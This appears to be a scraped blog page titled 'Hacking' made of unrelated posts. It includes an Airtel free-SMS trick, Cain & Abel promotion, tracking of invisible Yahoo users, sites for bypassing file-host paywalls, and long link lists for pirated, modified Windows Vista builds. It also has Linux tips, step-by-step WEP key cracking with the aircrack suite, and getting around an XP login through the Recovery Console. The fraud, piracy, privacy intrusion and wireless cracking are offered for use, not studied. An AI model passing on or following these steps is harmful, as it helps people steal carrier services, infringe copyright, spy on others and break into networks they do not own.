Hacking

Hacking

Hacking is wonderful practise only when you keep on safe side...

Here is a great trick for all the Airtel mobile users, who can send unlimited SMS for Free by following this hack.





Follow the simple steps below:

* Create a new message center :
Message Center Name: ANY
Message Center Number (MOST Important): +919810051905
Now select preferred connection -> Packet Data
* After creating a new message center, please manually select it from
MESSAGE CENTER IN USE BOX.
* Now Go to setting -> phone setting -> connection -> packet data
* Here change PACKET DATA CONNECTION -> when available
and Access Point -> Airtel Live! ( Pls. Write as I have written here)
* All setting has been DONE !!

Now for sending message. You have to write 0(zero) before any contact number. Pls don’t make mistake.

Note: Don’t Write 91….instead of 91 write 0.. For example: if number is 9893098970 then you’ll write 09893098970.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.



Cain & Abel is a useful tool for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons.

The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs
and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.

Hi friends,I m one of those guys who always sign in as invisible in my IM’s because if I set my status to “Online” or available, at least 6 (unwanted) chat windows will open and pest me up. However recently one good friend of mine tracked my status (both on Gmail and Yahoo),slightly baffled I asked him how he did that,and here I m sharing with you how he tracked my status on both IM’s. You can use the given methods to find your friends who try to hide from us,the lesser mortals.


TRACK INVISIBLE USERS ON YAHOO
Yahoo Messenger is a bit cryptic when it comes to tracking users,so we can track their status by these 2 methods -

1. Yahoo Invisibility Detection sites
2. Using Yahoo’s URL Resources

Yahoo Invisibility Detection Sites
I’ve found many sites which helps you to see which of your buddies are hiding online,some of these sites are:

YDetector.com Trace your invisible friends on yahoo Messenger
Invisible-Scanner.com
DetectInvisible.com
YahooScan.net
Invisible.ir

These site are very easy to use and self explain themselves. Just enter the ID you want to trace and get the status.
Yahoo URL Resources
Here are a bunch of URLs that can be used to detect invisible users, just replace “[username]” with the username you want to detect :

http://mail.opi.yahoo.com/online?u=[username]&m=g&t=0
(Shows up a yellow smiley if the person is online and gray if the person is offline or invisible)
http://mail.opi.yahoo.com/online?u=[username]&m=g&t=1
(Shows up a button with “Online Now” or “Not Online”)
http://mail.opi.yahoo.com/online?u=[username]&m=g&t=2
(Shows an image with “I am Online send me a message” or “Not Online right now”)

http://mail.opi.yahoo.com/online?u=[username]&m=a&t=0
(Shows a text with “[username] is ONLINE or NOT ONLINE”)

http://mail.opi.yahoo.com/online?u=[username]&m=a&t=1
(Shows “00” if person is offline and “01” if he is online)

remember,You have to replace the text in RED color in the given URL with the Yahoo ID you want to detect,
for eg - my YahooID is “iamrdx” ,the first URL is :

http://mail.opi.yahoo.com/online?u=[username]&m=g&t=0

After the replacement it would appear as :

http://mail.opi.yahoo.com/online?u=iamrdx&m=g&t=0

Rapidshare,Megaupload,Mediafire etc, has become one of the most famous file sharing networks.But unfortunately most of these file sharing sites have a premium area and the services from the free area are not good.But investing for the premium account for these sites are not really possible for us.So here in this blog i am listing some sites from which you can download like a premium user without investing a dime.These sites are known as Premium Link generators and they offer you to download without any restrictions and also you get full download speed,full download accelerator support and also resume facilities which are totally absent in the free scheme of the file sharing sites.So without wasting any time lets go to business.



1. Grablinksby.us

This is a very good premium link generator site.From this site you can download files like a premium user from multiple sites.
The sites which Grablinksby.us are :--

1.Rapidshare.com
2.megaupload.com
3.Easy-share.com
4.Deposit files.com
5.Megaporn.com
6.Megashare.com
7.Badongo.com
8.Megashares.com
9.Netload.in.
So download from this site
Maximum: 3 files per day Last test: 24/05/2009 Status: Working Limit: 200 mb

http://www.grablinksby.us/

2. Rslinkgens.info

This is also a premium link generator site.The sites which Rslinkgens.info supports are:-

1.Rapidshare.com
2.megaupload.com
3.Easyshare.com
4.gigasize.com.

Limitation:Maximum: 6 files per day Last test: 24/05/2009 Status: Working Limit: 220 mb

http://www.rslinkgens.info/


3.FastnFree4u.net

This is also a premium link generator site.The sites which fastnfree4u.netsupports are:-

1.Rapidshare.com
2.Megaupload.com

http://www.fastnfree4u.net/index.php

4. Nbe-media.net

The sites which Nbe-media.net supports are :-

1.Rapidshare.com
2.Megaupload.com

For all of you who like my post please comment and also leave any premium link generators that you know of.I Am Also Proving a screenshot of a download from these sites which support resume and pause facilities like premium accounts


Windows Vista Quattuor | 2.46 GB
This OS has been modded and tweaked to make any PC Shine and Run like a comet, it’s based on Sp2 x86… all gfx stuff is HQ and Reflective, enjoy Regs, Tweaks, Modss and Updates:(All Integrated Already in System)
















































































































































































* No Components were Removed from Original Version just Shared Videos and Images and Chinese Language.
* All Updates Incluided
* All Vista Ultimate Extras Added
* New Flash Vista Default Theme
* New Flash 3D Cursor
* New Default SideBar Gadgets
* Special Space HQ DreamScene Integrated
* New HQ Reflective Icons Integrated In System
* New User Icons
* New Selected Space HQ DevianArt Wallpapers
* New Logon Theme and Vista StartUp Logo
* Many Regs and Tweaks… UAC Disabled, Show File Extensions, Hibernation disabled…
* Network, Sound and Windows Advisor Windows 7 Taskbar Icons
* And Much More…

No Extra Applications were incluided in this release only clean modded and tweaked OS ready to use when installed, everything is setup silently for you…

Extras Folder: (Optional Stuff)
* Optional Cursor
* Optional Logon
* Optional Stardock ObjectDock Plus v1.9

Depositfiles
http://depositfiles.com/files/1g6ccvh0l
http://depositfiles.com/files/7j4jt3oat
http://depositfiles.com/files/kb7g3dmyd
http://depositfiles.com/files/qenqjcvqp
http://depositfiles.com/files/215tkpyih
http://depositfiles.com/files/ydwrpd26r
http://depositfiles.com/files/kdqiocivc
http://depositfiles.com/files/tyzvpropt
http://depositfiles.com/files/lneo95m2m
http://depositfiles.com/files/kk7g9mq43
http://depositfiles.com/files/b47t0qhrq
http://depositfiles.com/files/0s3nrsstq
http://depositfiles.com/files/faaer7f2h
http://depositfiles.com/files/4p1wg6uj1
http://depositfiles.com/files/cv2447m0s
http://depositfiles.com/files/do3rv4qfk
http://depositfiles.com/files/v3jxqnal1
http://depositfiles.com/files/8zbpmpms3
http://depositfiles.com/files/5233jjomx
http://depositfiles.com/files/k384jc3jg
http://depositfiles.com/files/mowejgvnx
http://depositfiles.com/files/fx20fun5o
http://depositfiles.com/files/2aretvj1o
http://depositfiles.com/files/03994ro94
http://depositfiles.com/files/hhfuh1e1z
http://depositfiles.com/files/5gugf5cus

Easy-Share
http://www.easy-share.com/1905681319/WI.VI.QU.part01.rar
http://www.easy-share.com/1905681350/WI.VI.QU.part02.rar
http://www.easy-share.com/1905681353/WI.VI.QU.part03.rar
http://www.easy-share.com/1905681327/WI.VI.QU.part04.rar
http://www.easy-share.com/1905681351/WI.VI.QU.part05.rar
http://www.easy-share.com/1905681328/WI.VI.QU.part06.rar
http://www.easy-share.com/1905681692/WI.VI.QU.part07.rar
http://www.easy-share.com/1905681346/WI.VI.QU.part08.rar
http://www.easy-share.com/1905681700/WI.VI.QU.part09.rar
http://www.easy-share.com/1905681705/WI.VI.QU.part10.rar
http://www.easy-share.com/1905681703/WI.VI.QU.part11.rar
http://www.easy-share.com/1905681681/WI.VI.QU.part12.rar
http://www.easy-share.com/1905681683/WI.VI.QU.part13.rar
http://www.easy-share.com/1905681682/WI.VI.QU.part14.rar
http://www.easy-share.com/1905681701/WI.VI.QU.part15.rar
http://www.easy-share.com/1905683310/WI.VI.QU.part16.rar
http://www.easy-share.com/1905683306/WI.VI.QU.part17.rar
http://www.easy-share.com/1905683311/WI.VI.QU.part18.rar
http://www.easy-share.com/1905683307/WI.VI.QU.part19.rar
http://www.easy-share.com/1905683312/WI.VI.QU.part20.rar
http://www.easy-share.com/1905683313/WI.VI.QU.part21.rar
http://www.easy-share.com/1905683300/WI.VI.QU.part22.rar
http://www.easy-share.com/1905683303/WI.VI.QU.part23.rar
http://www.easy-share.com/1905683305/WI.VI.QU.part24.rar
http://www.easy-share.com/1905683302/WI.VI.QU.part25.rar
http://www.easy-share.com/1905683301/WI.VI.QU.part26.rar

Hotfile
http://hotfile.com/dl/6308049/d03a537/WI.VI.QU.part01.rar.html
http://hotfile.com/dl/6308319/7f2990e/WI.VI.QU.part02.rar.html
http://hotfile.com/dl/6308561/d57a425/WI.VI.QU.part03.rar.html
http://hotfile.com/dl/6308811/f0b1678/WI.VI.QU.part04.rar.html
http://hotfile.com/dl/6308129/f18c60f/WI.VI.QU.part05.rar.html
http://hotfile.com/dl/6308398/69810eb/WI.VI.QU.part06.rar.html
http://hotfile.com/dl/6308661/ae6490a/WI.VI.QU.part07.rar.html
http://hotfile.com/dl/6308885/47c3435/WI.VI.QU.part08.rar.html
http://hotfile.com/dl/6308189/10577db/WI.VI.QU.part09.rar.html
http://hotfile.com/dl/6308434/7bd9d77/WI.VI.QU.part10.rar.html
http://hotfile.com/dl/6308715/3cb662a/WI.VI.QU.part11.rar.html
http://hotfile.com/dl/6308924/40c3aa2/WI.VI.QU.part12.rar.html
http://hotfile.com/dl/6308217/3cdd549/WI.VI.QU.part13.rar.html
http://hotfile.com/dl/6308461/2b9c5a8/WI.VI.QU.part14.rar.html
http://hotfile.com/dl/6308731/0703a47/WI.VI.QU.part15.rar.html
http://hotfile.com/dl/6308942/7dd387b/WI.VI.QU.part16.rar.html
http://hotfile.com/dl/6308162/27ecfc0/WI.VI.QU.part17.rar.html
http://hotfile.com/dl/6308419/7a7dedc/WI.VI.QU.part18.rar.html
http://hotfile.com/dl/6308687/a9cb537/WI.VI.QU.part19.rar.html
http://hotfile.com/dl/6308909/de17e80/WI.VI.QU.part20.rar.html
http://hotfile.com/dl/6308284/3976ead/WI.VI.QU.part21.rar.html
http://hotfile.com/dl/6308518/f06afcd/WI.VI.QU.part22.rar.html
http://hotfile.com/dl/6308770/6bef97c/WI.VI.QU.part23.rar.html
http://hotfile.com/dl/6308208/1e11958/WI.VI.QU.part24.rar.html
http://hotfile.com/dl/6308450/1f06006/WI.VI.QU.part25.rar.html
http://hotfile.com/dl/6308677/b9b7124/WI.VI.QU.part26.rar.html

Megaupload
http://www.megaupload.com/?d=MQE7RXOV
http://www.megaupload.com/?d=KEJITEC0
http://www.megaupload.com/?d=BVC527SQ
http://www.megaupload.com/?d=0EJ5HMYJ
http://www.megaupload.com/?d=EOYXA8MX
http://www.megaupload.com/?d=2UVENRHE
http://www.megaupload.com/?d=891BDXGG
http://www.megaupload.com/?d=3TTUYVAT
http://www.megaupload.com/?d=RMFK8YSJ
http://www.megaupload.com/?d=SRMC80X2
http://www.megaupload.com/?d=R1C7MZYX
http://www.megaupload.com/?d=DD3VQVVK
http://www.megaupload.com/?d=6CB6CCV8
http://www.megaupload.com/?d=33HT7ZJ7
http://www.megaupload.com/?d=2HC892YB
http://www.megaupload.com/?d=O8BOZ2AK
http://www.megaupload.com/?d=6G2VPRUW
http://www.megaupload.com/?d=BIOHFWTF
http://www.megaupload.com/?d=PHFW167N
http://www.megaupload.com/?d=Z39SGZC4
http://www.megaupload.com/?d=6KPV0CXG
http://www.megaupload.com/?d=ADH2RSX1
http://www.megaupload.com/?d=GS7CT210
http://www.megaupload.com/?d=GDAIX2H2
http://www.megaupload.com/?d=A5W835JB
http://www.megaupload.com/?d=WCXVXBT8

Rapidshare
http://rapidshare.com/files/243745483/WI.VI.QU.part01.rar
http://rapidshare.com/files/243745415/WI.VI.QU.part02.rar
http://rapidshare.com/files/243745419/WI.VI.QU.part03.rar
http://rapidshare.com/files/243745158/WI.VI.QU.part04.rar
http://rapidshare.com/files/243745453/WI.VI.QU.part05.rar
http://rapidshare.com/files/243745433/WI.VI.QU.part06.rar
http://rapidshare.com/files/243745450/WI.VI.QU.part07.rar
http://rapidshare.com/files/243745623/WI.VI.QU.part08.rar
http://rapidshare.com/files/243745351/WI.VI.QU.part09.rar
http://rapidshare.com/files/243745355/WI.VI.QU.part10.rar
http://rapidshare.com/files/243745460/WI.VI.QU.part11.rar
http://rapidshare.com/files/243745465/WI.VI.QU.part12.rar
http://rapidshare.com/files/243745211/WI.VI.QU.part13.rar
http://rapidshare.com/files/243745318/WI.VI.QU.part14.rar
http://rapidshare.com/files/243745438/WI.VI.QU.part15.rar
http://rapidshare.com/files/243745397/WI.VI.QU.part16.rar
http://rapidshare.com/files/243745097/WI.VI.QU.part17.rar
http://rapidshare.com/files/243745497/WI.VI.QU.part18.rar
http://rapidshare.com/files/243745280/WI.VI.QU.part19.rar
http://rapidshare.com/files/243745294/WI.VI.QU.part20.rar
http://rapidshare.com/files/243747113/WI.VI.QU.part21.rar
http://rapidshare.com/files/243747308/WI.VI.QU.part22.rar
http://rapidshare.com/files/243747487/WI.VI.QU.part23.rar
http://rapidshare.com/files/243747360/WI.VI.QU.part24.rar
http://rapidshare.com/files/243747212/WI.VI.QU.part25.rar
http://rapidshare.com/files/243747262/WI.VI.QU.part26.rar

Uploading
http://uploading.com/files/DCCI209O/WI.VI.QU.part01.rar.html
http://uploading.com/files/WNGS75RG/WI.VI.QU.part03.rar.html
http://uploading.com/files/DDZ4KQ4K/WI.VI.QU.part02.rar.html
http://uploading.com/files/7N51QB5K/WI.VI.QU.part04.rar.html
http://uploading.com/files/3TALRRZS/WI.VI.QU.part05.rar.html
http://uploading.com/files/VENBYVHX/WI.VI.QU.part06.rar.html
http://uploading.com/files/A2EDERNO/WI.VI.QU.part07.rar.html
http://uploading.com/files/62F2BS1H/WI.VI.QU.part08.rar.html
http://uploading.com/files/DKNJLGPN/WI.VI.QU.part09.rar.html
http://uploading.com/files/HLQWUJW9/WI.VI.QU.part10.rar.html
http://uploading.com/files/5I2279Q4/WI.VI.QU.part11.rar.html
http://uploading.com/files/GEROW6K2/WI.VI.QU.part12.rar.html
http://uploading.com/files/Z55GB2L3/WI.VI.QU.part13.rar.html
http://uploading.com/files/JS8SUXC1/WI.VI.QU.part14.rar.html
http://uploading.com/files/WUSK9C7X/WI.VI.QU.part15.rar.html
http://uploading.com/files/DZDDZBTA/WI.VI.QU.part16.rar.html
http://uploading.com/files/SLFPVRKA/WI.VI.QU.part17.rar.html
http://uploading.com/files/LDW5SCBH/WI.VI.QU.part18.rar.html
http://uploading.com/files/X89HJ3LB/WI.VI.QU.part19.rar.html
http://uploading.com/files/6864W59M/WI.VI.QU.part20.rar.html
http://uploading.com/files/AG1R7IKF/WI.VI.QU.part21.rar.html
http://uploading.com/files/FQ099DLV/WI.VI.QU.part22.rar.html
http://uploading.com/files/LL22IYF1/WI.VI.QU.part23.rar.html
http://uploading.com/files/KGXZYVSN/WI.VI.QU.part24.rar.html
http://uploading.com/files/CP6DTK62/WI.VI.QU.part25.rar.html
http://uploading.com/files/QMNYXZG5/WI.VI.QU.part26.rar.html


Windows Vista Black Eternity x86 (Genuine Version) | 3.3 GB | RS
This Operational system is absolutely developed from Original x86 Vista Ultimate.



It is added:
* New Windows Sounds
* No more BSOD error screens
* All Windows Ultimate Extras Integrated
* UAC Disabled
* Enabled AntiSpyware Realtime Protection
* Show extensions for known file types
* Enabled IE Phishing Filter
* New Default Theme
* Extra 3′rd Party themes
* Windows Powershell 1.0
* Hibernation is Disabled.
* It will give full supportive for the High Definition Games.
* 600 Sidebar Gadgets
* Latest Dreamescene Packs (Exclusive and Premium Packs)
* New Logon Screensaver added
* New Login Screen
* New Icons
* New Buttons
* New Look for windows media center
* Registry Tweaks are added( Copy to, Move to, Command Prompt, Take ownership, Encrypt and more)
* Maximum parallel downloads for IE to 20 (Default is 2)
* New Updated graphics card drivers are integrated.
* New Explorer View
* New Setup Process
* Patched Uxtheme files so u can use any 3rd party themes
* Classic Control Panel
* DirectX Updated
* System Files are boosted upto maximum Performance
* All Printers Drivers (Updated)
* All Graphics card drivers (Updated)
* All Sound Card Drivers (Updated)
* All SCSI-RAID Drivers (Updated)
* All Scanners Drivers
* Resolved some reliability issues in the USB core components
* Added hotfix for resolving some performance and reliability issues
* Improved the reliability of Windows Media Player
* Resolved an issue where messages become stuck in the Outbox and cannot
be deleted when usingWindows Mail
* Resolved a set of known application compatibility issues
* Resolved the issue in which Microsoft Windows Search Indexer stops
working and closes.
* Resolved an issue in VBScript/JScript scripts from CScript\WScript hosts,
certain built-ins may not function correctly when “Standards and Formats” in
“Regional Settings” is changed.
* Updated IR Set Top Box database for Media Center for Windows Vista
Eternity 2009.
* Updated to show new error codes provided for WUSAS for update detection
vendors.
* Resolved an issue where an error message is displayed when installing a
new hardware device on a system running Windows Vista Eternity 2009.
* Resolved potential Graphics Virtual Address problems that may occur when
running Windows Vista Eternity 2009.
* Updated ActiveX Killbits

Drivers Which are missed in Vista by default are fixed:
* Graphics card drivers for

Intel(R) G31 Express Chipset
Intel(R) G33 Express Chipset
Intel(R) G35 Express Chipset
Intel(R) G965 Express Chipset
Intel(R) Q33 Express Chipset
Intel(R) Q35 Express Chipset
Intel(R) Q963 Express Chipset
Intel(R) Q965 Express Chipset
Intel(R) 4 Series Internal Chipset
Intel(R) Q45/Q43 Express Chipset
Intel(R) Q45/Q43 Express Chipset
Intel(R) G45/G43 Express Chipset
Intel(R) G45/G43 Express Chipset
Intel(R) G41 Express Chipset
Mobile Intel(R) 45 Express Chipset Family
Mobile Intel(R) GL960 Express Chipset
Mobile Intel(R) GLE960 Express Chipset
Mobile Intel(R) GM965 Express Chipset
Mobile Intel(R) GME965 Express Chipset

*Other Graphics Drivers for:
ATI All in Wonder 2006 Series
ATI All in Wonder (for all models)
ATI All in Wonder Pro 9800 Series
ATI HD Radeon 4870 Series
ATI Radeon 9800 Series
NVIDIA 200 Series
NVIDIA Geforce 5FX Series
NVIDIA Geforce 8M series
NVIDIA QUADRO FX SERIES
NVIDIA GeForce 9800 GX2
NVIDIA GeForce 9800 GTX
NVIDIA GeForce 9600 GT
NVIDIA GeForce 9600 GSO
NVIDIA GeForce 9400 GT
NVIDIA GeForce 9300 GS
NVIDIA GeForce 9300 GE
NVIDIA GeForce 8800 Ultra
NVIDIA GeForce 8800 GTX
NVIDIA GeForce 8800 GTS 512
NVIDIA GeForce 8800 GTS
NVIDIA GeForce 8800 GT
NVIDIA GeForce 8800 GS
NVIDIA GeForce 8600 GTS
NVIDIA GeForce 8600 GT
NVIDIA GeForce 8600 GS
NVIDIA GeForce 8500 GT
NVIDIA GeForce 8400 GS
NVIDIA GeForce 8400 SE
NVIDIA GeForce 8400
NVIDIA GeForce 8300 GS
NVIDIA GeForce 8300
NVIDIA GeForce 8200
NVIDIA GeForce 8200/NVIDIA nForce 730a
NVIDIA GeForce 8100/NVIDIA nForce 720a
NVIDIA GeForce 7950 GX2
NVIDIA GeForce 7950 GT
NVIDIA GeForce 7900 GTX
NVIDIA GeForce 7900 GT/GTO
NVIDIA GeForce 7900 GS
NVIDIA GeForce 7800 SLI
NVIDIA GeForce 7800 GTX
NVIDIA GeForce 7800 GT
NVIDIA GeForce 7800 GS
NVIDIA GeForce 7650 GS
NVIDIA GeForce 7600 GT
NVIDIA GeForce 7600 GS
NVIDIA GeForce 7600 LE
NVIDIA GeForce 7500 LE
NVIDIA GeForce 7350 LE
NVIDIA GeForce 7300 SE
NVIDIA GeForce 7300 LE
NVIDIA GeForce 7300 GT
NVIDIA GeForce 7300 GS
NVIDIA GeForce 7200 GS
NVIDIA GeForce 7100 GS
NVIDIA GeForce 7150 / NVIDIA nForce 630i
NVIDIA GeForce 7100 / NVIDIA nForce 630i
NVIDIA GeForce 7100 / NVIDIA nForce 620i
NVIDIA GeForce 7050 / NVIDIA nForce 630i
NVIDIA GeForce 7050 / NVIDIA nForce 610i
NVIDIA GeForce 7050 PV / NVIDIA nForce 630a
NVIDIA GeForce 7025 / NVIDIA nForce 630a
NVIDIA GeForce 6800 XT
NVIDIA GeForce 6800 XE
NVIDIA GeForce 6800 Ultra
NVIDIA GeForce 6800 Series GPU
NVIDIA GeForce 6800 LE
NVIDIA GeForce 6800 GT
NVIDIA GeForce 6800 GS/XT
NVIDIA GeForce 6800 GS
NVIDIA GeForce 6800
NVIDIA GeForce 6700 XL
NVIDIA GeForce 6610 XL
NVIDIA GeForce 6600 VE
NVIDIA GeForce 6600 LE
NVIDIA GeForce 6600 GT
NVIDIA GeForce 6600
NVIDIA GeForce 6500
NVIDIA GeForce 6250
NVIDIA GeForce 6200SE TurboCache™
NVIDIA GeForce 6200 TurboCache™
NVIDIA GeForce 6200 LE
NVIDIA GeForce 6200 A-LE
NVIDIA GeForce 6200
NVIDIA GeForce 6150SE nForce 430
NVIDIA GeForce 6150 LE
NVIDIA GeForce 6150
NVIDIA GeForce 6100 nForce 420
NVIDIA GeForce 6100 nForce 405
NVIDIA GeForce 6100 nForce 400
NVIDIA GeForce 6100

Programs:
* Microsoft Office 2007 (Genuine)
* 7-Zip
* Mozilla
* Adobe Flash Player
* Hyper Snap 6
* Rocket Dock
* Winrar
* K-Lite Codecs 4.14 Full
* Image Burn
* Vista Codecs
* Dolby Digital Surround Plugins
* Yahoo messenger for Vista Eternity 2009
* Ashampoo Music Studio
* Microsoft Plus! for Vista
* DVD Shrink 3.2
* J. River Media Center
* DVD Region Free 5.9
* Nero 8.4 Ultra
* Internet Download Manager 5.14
* ESET NOD 32 Antivirus 3.0
* VLC Media Player
* ACD See Photo Manager 10
* Ultra ISO 9.3
* Xilisoft Video Converter 5.0

Minimal system requirements:
• 1GB RAM
• 20 GB of HDD space
• 128MB of Graphics Memory (Capable to run Windows Aero)
• 17’ inch Monitor (1024 x 768)
• DVD-ROM or DVD-RAM
• Above Pentium IV Processor

DOWNLOAD

http://rapidshare.com/files/241182144/www.indogear.com.VE2009SP1.part01.rar
http://rapidshare.com/files/241182276/www.indogear.com.VE2009SP1.part02.rar
http://rapidshare.com/files/241182339/www.indogear.com.VE2009SP1.part03.rar
http://rapidshare.com/files/241182316/www.indogear.com.VE2009SP1.part04.rar
http://rapidshare.com/files/241182392/www.indogear.com.VE2009SP1.part05.rar
http://rapidshare.com/files/241182390/www.indogear.com.VE2009SP1.part06.rar
http://rapidshare.com/files/241182380/www.indogear.com.VE2009SP1.part07.rar
http://rapidshare.com/files/241182397/www.indogear.com.VE2009SP1.part08.rar
http://rapidshare.com/files/241182398/www.indogear.com.VE2009SP1.part09.rar
http://rapidshare.com/files/241182366/www.indogear.com.VE2009SP1.part10.rar
http://rapidshare.com/files/241184526/www.indogear.com.VE2009SP1.part11.rar
http://rapidshare.com/files/241184414/www.indogear.com.VE2009SP1.part12.rar
http://rapidshare.com/files/241184431/www.indogear.com.VE2009SP1.part13.rar
http://rapidshare.com/files/241184529/www.indogear.com.VE2009SP1.part14.rar
http://rapidshare.com/files/241184451/www.indogear.com.VE2009SP1.part15.rar
http://rapidshare.com/files/241184333/www.indogear.com.VE2009SP1.part16.rar
http://rapidshare.com/files/241184445/www.indogear.com.VE2009SP1.part17.rar
http://rapidshare.com/files/241184408/www.indogear.com.VE2009SP1.part18.rar
http://rapidshare.com/files/241184281/www.indogear.com.VE2009SP1.part19.rar
http://rapidshare.com/files/241187575/www.indogear.com.VE2009SP1.part20.rar
http://rapidshare.com/files/241188522/www.indogear.com.VE2009SP1.part21.rar
http://rapidshare.com/files/241188414/www.indogear.com.VE2009SP1.part22.rar
http://rapidshare.com/files/241188483/www.indogear.com.VE2009SP1.part23.rar
http://rapidshare.com/files/241187323/www.indogear.com.VE2009SP1.part24.rar
http://rapidshare.com/files/241188551/www.indogear.com.VE2009SP1.part25.rar
http://rapidshare.com/files/241188616/www.indogear.com.VE2009SP1.part26.rar
http://rapidshare.com/files/241187463/www.indogear.com.VE2009SP1.part27.rar
http://rapidshare.com/files/241187449/www.indogear.com.VE2009SP1.part28.rar
http://rapidshare.com/files/241187500/www.indogear.com.VE2009SP1.part29.rar
http://rapidshare.com/files/241187577/www.indogear.com.VE2009SP1.part30.rar
http://rapidshare.com/files/241192649/www.indogear.com.VE2009SP1.part31.rar
http://rapidshare.com/files/241192611/www.indogear.com.VE2009SP1.part32.rar
http://rapidshare.com/files/241192761/www.indogear.com.VE2009SP1.part33.rar
http://rapidshare.com/files/241192706/www.indogear.com.VE2009SP1.part34.rar

The beauty of Linux is in users ability to do large amount of customization to have a unique user expereince. So today we will look in to some tips for a “better” Linux experience. The term “better” here is relative, because what works for me might seem a distraction for some or plain annoying to others; some of this “tips” might appeal to beginners, while advanced users might find it too easy. Hopefully some of these tips will be helpful to some of you.

1) Turn on your computer remotely by sending “magic network packets” to WakeOnLan supported network cards. This can be very helpful if you run a server at home but only access it occasionally. There is no need for you to have the server running all the time.

2) If you dual boot with windows, accessing Linux file system from your windows installation might be important for you. There are three windows applications that can help you do this: Explore2fs, Ext2 Installable File System, DiskInternals Linux Reader.
3) Similarly to have read/write access for Windows NTFS file system, you can use NTFS-3G. Most recent popular Linux distribution has NTFS-3G installed out of the box.

4) Share a single mouse and keyboard with multiple computers with different operating systems, each with its own display, with support for copy and paste. Thanks to Synergy, the most popular free KVM software switch out there.

5) Recovering data from damaged media can be handled by several Linux tools including some LiveCD, specifically built to help recover data. Parted Magic, Ubuntu Rescue Remix, SystemRescueCd, Foremost (data recovery), Ddrescue.

6) If you are a blogger like me and enjoy using desktop client over web editors, you will find these clients useful: Gnome Blog, Drivel Journal Editor, BloGTK, Thingamablog, Bleezer, QTM.

7) If you are a webdeveloper/designer, you will often find yourself testing a website across many platforms and browsers. IEs4Linux is a great painless way to check how IE browser will render your website. You could use services like browsershots, but I had mixed results with them.

8) Does your iPod miss iTunes? Here are three itunes alternative which will do most of what your iTunes would do, not an exact replacement; but does the job: Amarok, Banshee, Rhythmbox.

9) Follow multiple files by creating multiple windows in your console with the help of MultiTail, also known as tail on steroids.

10) Use Terminator to split your screen space with many terminal windows, both horizontally and vertically.

11) For even better control over your terminal display and customization and complex functions, GNU Screen is a much better choice over terminator; however terminator serves only one purpose.

12) Use RSIBreak to help prevent Repetitive Strain Injury. RSIBreak will force you to take short break, depending on your configuration, so that you don’t over-work yourself.

13) If you find yourself working on a dumb terminal (hello sysadmins) or prefer working on terminals, you will find newsbeuter to be an excellent RSS reader for the console.

14) I know some will disagree with me on this, but conky is an excellent compliment to your desktop experience. If properly configured, it can add a lot of value to your desktop environment. Check out this very creative conky setup and read about it here.

15) Do you do podcasts? rootprompt has a great article with huge resources for both Linux podcasters and listeners.

Okay, before we begin, I give you Hungry Hacker´s fun facts on WEP.

FUN FACTS:

-WEP stands for Wired Equivalent Privacy
-WEP is used to secure wireless networks from eavesdroppers
-WEP usually takes hours to crack

WEP has always been a long and tedious job, untill recently, when two FBI agents demonstrated how it´s possible to crack WEP in under 4 minutes (3 to be exact).

Here is how they did it:

1. Run Kismet to find your target network. Get the SSID and the channel.
2. Run Airodump and start capturing data.
3. With Aireplay, start replaying a packet on the target network. (You can find a ‘good packet’ by looking at the BSSID MAC on Kismet and comparing it to the captured packet’s BSSID MAC).
4. Watch as Airodump goes crazy with new IVs. Thanks to Aireplay.
5. Stop Airodump when you have about 1,000 IVs.
6. Run Aircrack on the captured file.
7. You should see the WEP key infront of you now.

PROGRAMS USED:

-Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
It is designed for Linux.

You can download it at www.kismetwireless.net
A windows version can be downloaded at http://www.renderlab.net/projects/wrt54g/kiswin.html

-Aircrack (Includes Airodump, Aireplay, Aircrack and optional Airdecap for decrypting WEP/WPA capture files)

Aircrack is the 802.11 WEP and WPA-PSK keys cracking program that can recover this keys once enough encrypted packets have been captured with airodump.

Airdecap is used to decrypt WEP/WPA capture files.

Airmon can be used to configure the wireless card.

Aireplay is used to inject frames.

Airodump is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (initialization vectors) for the intent of using them with aircrack-ng.

Download the whole suit at www.aircrack-ng.org

You may come across a situation in which your windows XP PC fails to reboot, and the most accepted solution to that problem is to re-format the Hard Disk. Before formatting, you should backup your files. If your computer is password protected, you won’t be able to access them from outside, so here is a method for getting around this.



Steps :

1. Boot the machine from Windows XP bootable CD.
2. At the setup screen, select R to repair using Recovery Console.
3. Now the console program will prompt you to select the Windows folder (eg. C:\WINDOWS) where the Windows is installed (you need to enter a number from the list of folders shown to you).
4. Type ‘HELP’ (without single quotes) and press enter for available commands. This is like a DOS program, but some features are not available
5. Change the current directory to the user’s directory where you want to backup.
6. Type ‘CD “C:\Documents and Settings\X”‘ (without single quotes) and press enter. Where X is the username.
7. Now the current directory will change to “C:\Documents and Settings\X”.
8. Now change the directory to Desktop by entering ‘CD Desktop’ (without single quotes) and press enter to go to the desktop folder.
9. Type ‘DIR’ (Without single quotes) and press enter, you will be listed all the available files in Desktop.
10. Type ‘COPY a.doc D:\BACKUP’ (without quotes) and press enter, where a.doc is a file available in Desktop and the folder D:\BACKUP available to copy the files.
11. As in step 7,8,9,10 you can backup other folders like “My Documents”, “My Music”, etc.
12. Note that you cannot use wildcards for COPY, i.e. you cannot copy all the files in a folder at once. You must copy one file by one.


Tips :

Before doing this, try changing the password to blank so that you can access the data from another machine to easily drag and drop to copy your data.

Warnings :

Any data not backed up will be permanently deleted when you re-format the hard drive, so make sure you back up any thing you want to keep.

Things You’ll Need :

A Bootable Windows XP CD

